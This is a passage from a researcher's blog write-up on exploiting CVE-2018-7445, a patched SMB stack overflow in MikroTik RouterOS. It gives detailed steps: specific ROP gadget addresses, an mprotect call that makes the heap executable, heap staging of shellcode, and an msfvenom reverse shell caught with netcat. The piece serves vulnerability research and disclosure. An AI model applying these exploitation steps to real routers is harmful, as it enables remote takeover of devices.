particular case though, we only want to mark the heap area as executable. The end goal is to store something in the heap (which already contains messages read from the client) and jump there taking advantage of the static base address. The relevant function here is mprotect, which looks as follows: int mprotect(void *addr, size_t len, int prot); The address will be 0x8072000, which is the base of the heap. This needs to be page-aligned for it to work. Len can be anything we want, but let’s change the protection of the whole 0x14000 bytes. Finally, prot refers to a bitwise-or of the desired protections to enforce. 7 refers to PROT_READ | PROT_WRITE | PROT_EXEC, which is essentially the RWX we are aiming for. There are various tools that can attempt to create the chain automatically, such as ROPGadget and Ropper. We will use ropper but build the ROP chain manually to show how it can be done. As per the Linux system call convention, EAX will contain the syscall number, which is 0x7d for mprotect. EBX will contain the address parameter, ECX the size and EDX the desired protection. Let’s start setting EBX to 0x8072000. We look for a gadget that contains the POP EBX instruction and has the least side-effects possible. We choose the smaller gadget and start constructing our chain. This looks as follows. Execution will be redirected to 0x804c39d, which will first execute a POP EBX instruction, setting EBX to the desired value of 0x8072000. Next, POP EBP will be executed, so we need to provide some dummy value so there is something to pop from the stack. Finally, the RET instruction is executed, which pops whatever is next in the stack and jumps there. This needs to be our next step in the chain. All values are packed as little-endian unsigned integers. We do the same process to set the desired size in ECX. It is important to understand that the order matters, as we could be unknowingly overwriting the registers we have already set if we are not careful. Moreover, sometimes the gadgets will not look as nice as POP DESIRED_REG; RET and we will have to deal with potential side effects that need additional adjustments. Here we will choose the more benign 0x080664f5. This gadget alters the value of EAX, but we do not rely on anything specific set in EAX at this time, so it is useful. We append this to our ROP chain. We repeat the process, this time to set EDX to 7, which is the RWX protection level. This time we select the gadget at 0x08066f24, which does not mess with our previously set registers. Finally, we need to set EAX to the syscall number 0x7d. We search gadgets containing POP EAX and do not find anything that will not alter our current setup. We could try to reorder our gadgets in a different way, but we will just search for another gadget that does XCHG EAX, EBP and chain it with the ubiquitous POP EBP; RET. From here we take 0x804f94a and 0x804c39e and append them. The registers are now configured as desired to execute the mprotect system call. In order to do this, we need to call INT 0x80, which notifies the kernel that we want to execute the system call. However, when we look for gadgets containing this instruction, we find none. This can make things a bit more difficult. Luckily, there is another place where we can find this kind of gadget. All user space applications have a small shared library mapped into their address space by the kernel that is called vDSO (virtual dynamic shared object). This exists for performance reasons and is a way for the kernel to export certain functions to user space and avoid the context switch for functions that are called very often. If we take a look at the man page, we will see something interesting: This means there is a function in the vDSO that might know how to perform system calls. We can inspect what this function does in GDB. As can be observed in the screenshot above, __kernel_vsyscall contains a useful gadget. We execute the process a few times and realize that this mapping is not affected by ASLR, which allows us to use this gadget. The values of EBX, ECX and EBP do not really matter right now, as they will be set after the system call is executed anyway. We update the exploit code to send the chain we built and attach GDB to the running SMB binary. EIP will redirect execution to our first gadget, so it is a good idea to put a breakpoint at 0x804c39d, which is the start of the chain. Use stepi to observe how the registers are set to the desired values. Right after INT 0x80, we can list the mapped areas and if everything worked OK, the heap will be marked as RWX. The remaining piece consists of storing arbitrary code in the heap at a known location so we can jump there and get a shell, but how can we do this? When we put a breakpoint in read(), we observed that the request data was being stored somewhere in the heap. In addition, we had various samples of Negotiate Protocol Request requests, so it is possible to determine that if the message type byte is set to 0x00 then we are going to reach some path in the program where the payload will be processed and stored in the heap. To test this assumption, let’s put a breakpoint in read() again and change the PoC payload to send a benign Negotiate Protocol Request message with 512 “A”s as content. As a reminder, the format is: message type (1 byte) — flags (1 byte) — message length (2 bytes) —message This time message type will be set to NETBIOS_SESSION_MESSAGE (0x00). We are not using another Session Request message (0x81) to avoid accidentally triggering the vulnerability and having to deal with the “.” characters that the vulnerable function places in between. Step through the read function until the 0x204 bytes (512 “A”s + the 4 byte header) are read from the network. As stated before, ECX contains the address of the buffer. Inspecting the memory contents at the specified address shows our payload. Press c to allow execution to continue normally and send a new request to check if the previous one gets overwritten or if it is just left there in the heap for now. When the breakpoint is reached again, we try to print the contents of the read buffer and unfortunately we realize that it has been zeroed out. However, the previous request could still be lingering somewhere else if the application made a copy that was not zeroed out. It is possible to search the current address space with PEDA by using the find or searchmem commands. Our message consists of 512 “A”s, so we attempt to find a contiguous block of “A”s. The commands take an optional parameter separated by a white-space to confine the search to a specific area. We are only interested in results that might be present in the heap. This means that the contents of the request are being copied and left in some buffer that is not cleared out. We need to make a few more tests to be able to trust this location to store our payload. In particular, if we change the script to send 512 “B”s instead of “A”s, we will see that 0x8085074 will end up containing the “B”s after the request is processed. We need data to persist throughout additional requests, so this is not good. However, if we first send 512 “A”s and then let’s say 256 “B”s, it will become evident that the first half is overwritten but the second half will still contain the bytes from the previous request. The weird looking 0x00000e89 is chunk metadata from the heap control structures and is not relevant to our scenario. Knowing that the data will be persistent across at least two requests, we can craft the following plan: Send a Negotiate Protocol Request with the code we want to execute. The first part will be a few hundred NOP instructions because these bytes will be overwritten when we issue the second request with the corresponding Session Request message that triggers the vulnerability. Send a Session Request message that corrupts the stack, ROPs to mprotect, marks the heap as executable and jumps to the hard-coded location where the payload from #1 is stored, abusing the fact that the heap base is not randomized. We make an arbitrary decision to leave 512 bytes for the second request, so we will jump at the hard-coded location of 0x8085074 + 512 = 0x8085270. This address needs to be appended to our ROP chain. The previous gadget will execute its final RET instruction, 0x8085270 will be popped from the stack and the program execution will follow. The first version of the shellcode will consist only of INT3 instructions so the debugger breaks upon execution. The opcode for INT3 is CC. The script is also modified to open two connections, one for each request. Attach to a new SMB process and run the exploit. We are now executing arbitrary code. Let’s generate a reverse shell payload with msfvenom. We modify the first stage to store this payload and run the exploit again. This time we open a netcat listener at the specified port so we can receive the connection. …and we have a shell. Hooray! Conclusion Fuzzing a network service using a mutation-based approach can be done with very little effort and may produce great results. If you are looking for vulnerabilities in applications that talk arcane proprietary protocols or are just too lazy to build a comprehensive template, give dumb fuzzing a go. You can even leave the fuzzer running with minimum effort while you apply your ninja reverse engineering skills to understand the protocol and build something better. RouterOS powered devices are now everywhere and the lack of modern (for arbitrary definitions of modern) exploit mitigations is a bit worrisome. Having full ASLR enabled would make the life of exploit writers a bit more difficult, and most stack overflows would be rendered unexploitable in the absence of info-leak vulnerabilities if the binaries were compiled with stack canaries support. It is worth mentioning that MikroTik’s response and patch times were great. At first the changelog did not hint a security vulnerability existed: What's new in 6.41.3 (2018-Mar-08 11:55): *) smb - improved NetBIOS name handling and stability; However, they seem to be more serious now. They include more detailed comments in their changelogs regarding security vulnerabilities and seem to have a blog where they post official announcements regarding these types of issues as well. The astute reader might have noticed that if you reproduced the steps outlined in this post, you might even have found a few additional 0days in RouterOS SMB. Have fun! Additional resources Original advisory at Core Security (https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow) Detailed analysis of chimay-red (the bug in WWW leaked in Vault 7) https://blog.seekintoo.com/chimay-red.html MIPS exploit of the bug described in this post by BigNerd95 https://github.com/BigNerd95/Chimay-Blue Jacob Baines posts https://medium.com/@jbaines Cool analysis of the famous Winbox vulnerability from last year https://n0p.me/winbox-bug-dissection/ 0ki MikroTik tools https://github.com/0ki/mikrotik-tools 0ki’s research hub with dozens of presentations in video/slides format https://kirils.org/ maxi Sursa: https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1
      • 1
      • Thanks
×
×
  • Create New...